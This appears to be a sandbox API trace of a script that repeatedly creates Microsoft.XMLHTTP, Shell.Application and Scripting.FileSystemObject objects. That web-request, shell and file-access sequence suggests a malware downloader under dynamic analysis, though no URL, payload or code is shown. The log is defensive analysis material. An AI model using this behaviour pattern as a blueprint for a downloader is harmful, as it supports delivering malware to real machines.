	[0681.165] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0681.165] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0681.165] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0682.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0682.278] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0682.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0682.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0682.278] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0682.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0682.278] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0682.278] SysStringLen (param_1=0x0) returned 0x0
	[0682.278] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0682.279] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0682.279] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0682.279] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0682.279] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0682.279] ??2@YAPEAX_K@Z () returned 0x62f350
	[0682.279] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0682.279] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0682.279] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0682.279] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0682.279] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0682.279] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0682.279] SysStringLen (param_1=0x0) returned 0x0
	[0682.279] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0682.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0682.282] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0682.282] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0682.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0682.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0682.283] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0687.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0687.639] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0687.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0687.640] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0687.640] SysStringLen (param_1=0x0) returned 0x0
	[0687.640] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0687.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0687.641] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0687.641] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0687.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0687.641] ??2@YAPEAX_K@Z () returned 0x62f310
	[0687.641] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0687.641] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0687.641] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0687.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0687.641] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0687.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.642] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0687.644] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0687.645] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0687.645] SysStringLen (param_1=0x0) returned 0x0
	[0687.645] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0687.645] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0687.645] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0687.645] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0687.645] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0687.645] ??2@YAPEAX_K@Z () returned 0x62f330
	[0687.645] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0687.645] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0687.646] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0687.646] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0687.646] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0687.646] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.646] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0687.646] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0687.646] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0687.646] SysStringLen (param_1=0x0) returned 0x0
	[0687.646] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0687.647] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0687.647] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0687.647] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0687.647] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0687.647] ??2@YAPEAX_K@Z () returned 0x62f310
	[0687.647] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0687.647] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0687.647] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0687.647] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0687.647] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0687.647] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.648] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0687.648] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0687.648] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0687.648] SysStringLen (param_1=0x0) returned 0x0
	[0687.648] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0687.648] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0687.648] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0687.648] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0687.648] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0687.648] ??2@YAPEAX_K@Z () returned 0x62f330
	[0687.649] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0687.649] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0687.649] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0687.649] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0687.649] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0687.649] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0687.649] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0687.649] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0687.649] longjmp () 
	[0687.649] longjmp () 
